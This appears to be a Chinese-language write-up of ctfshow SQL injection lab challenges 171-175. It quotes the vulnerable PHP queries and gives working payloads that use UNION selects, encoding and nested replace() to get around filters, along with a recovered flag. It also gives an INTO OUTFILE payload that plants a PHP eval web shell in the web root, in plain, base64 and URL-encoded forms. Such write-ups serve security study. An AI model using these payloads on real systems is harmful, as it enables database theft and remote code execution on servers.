sql注入:注意看清楚是几列,不行的话:抓包尝试(URL),本地测试
171-175:对返回值过滤,对查询语句无过滤
1.闭合,逃逸
//拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
-1' or id=' 26 9999' or id ='26
2.联合查询,偷梁换柱
//拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;"; //检查结果是否有flag if($row->username!=='flag'){ $ret['msg']='查询成功'; }
联合查询,username不能有"flag"
9999' union select id,password from ctfshows_user2 where username = 'flag 9999' union select b.id,b.password from ctfshow_user2 as b where b.username = 'flag
3.联合查询,重命名,转字符(hex(),base64_encode())
//拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/flag/i', json_encode($ret))){ $ret['msg']='查询成功'; }
9999' union select hex(b.username),b.password from ctfshow_user3 as b where b.username = 'flag 9999' union select to_base64(b.username),b.password from ctfshow_user3 as b where b.username = 'flag
4.字符代替replace()函数,replace(ori,query,alternative)
查询语句
//拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;"; //检查结果是否有flag if(!preg_match('/flag|[0-9]/i', json_encode($ret))){ $ret['msg']='查询成功'; }
用户名和密码肯定是字符,且题目说不能包含数字 9999' union select 'a','b 有回显 XXXXX 9999' union select to_base64(b.username),b.password from ctfshow_user4 as b where b.username = 'flag replace(b.username,'1','!') replace(replace(b.username,'1','!'),'2','@') replace(replace(replace(b.username,'1','!'),'2','@'),'3','#') replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$') replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%') replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^') replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&') replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*') replace(replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','(') replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','('),'0',')') payload: 9999' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(b.password,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','('),'0',')') from ctfshow_user4 as b where b.username = 'flag ctfshow{!ba*@aba-e$!%-$@*d-a)d*-aba$b@#(^&$!} ctfshow{1ba82aba-e415-428d-a0d8-aba4b2396741}
5.写入木马文件,from_base64()函数,URL编码
//拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; }
999' union select 'a',<?php eval($_POST[1]);?> into outfile '/var/www/html/1.php 999' union select 'a',from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/1.php payload: %39%39%39%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%61%27%2c%66%72%6f%6d%5f%62%61%73%65%36%34%28%22%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b%22%29%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%0a
补充:[\x00-\x7f]
这个字符类(character class)在正则表达式中代表一个范围,包含了从 \x00
到 \x7f
的所有字符。这些字符对应于 ASCII 字符集中的字符。ASCII(American Standard Code for Information Interchange)是一个基于拉丁字母的计算机字符编码标准,它最初包括了128个字符(或称为码点),这些字符被编号从0到127。
具体来说,[\x00-\x7f]
包括以下类型的字符:
-
控制字符(Control Characters):从
\x00
(NUL,空字符)到\x1F
(Unit Separator 1,即 US),这些字符主要用于控制设备或程序的运行,而不是显示或打印。例如,\x07
(BEL,响铃)可能会使计算机发出哔哔声,\x0A
(LF,换行符)和\x0D
(CR,回车符)用于文本文件中表示行的结束。 -
可打印字符(Printable Characters):从
\x20
(空格)到\x7E
(波浪号 ~),这些字符可以直接在屏幕上显示或打印。它们包括英文字母(大写和小写)、数字、标点符号和空格。-
空格(
\x20
) -
英文字母(大写
\x41
-\x5A
,小写\x61
-\x7A
) -
数字(
\x30
-\x39
) -
标点符号(如逗号
\x2C
、句号\x2E
、问号\x3F
等) -
其他特殊字符(如加号
\x2B
、减号\x2D
、等号\x3D
等)
-
\x7F
(DELETE,删除字符)是一个特殊的控制字符,虽然它通常不被视为可打印字符,但它也属于 ASCII 字符集的一部分。
值得注意的是,ASCII 字符集只包含了基本的拉丁字符和一些控制字符,不包含重音符号、其他语言的字符(如中文、日文、韩文等)或表情符号等。这些更复杂的字符需要使用其他编码标准,如 Unicode(UTF-8、UTF-16、UTF-32 等是其编码方式)。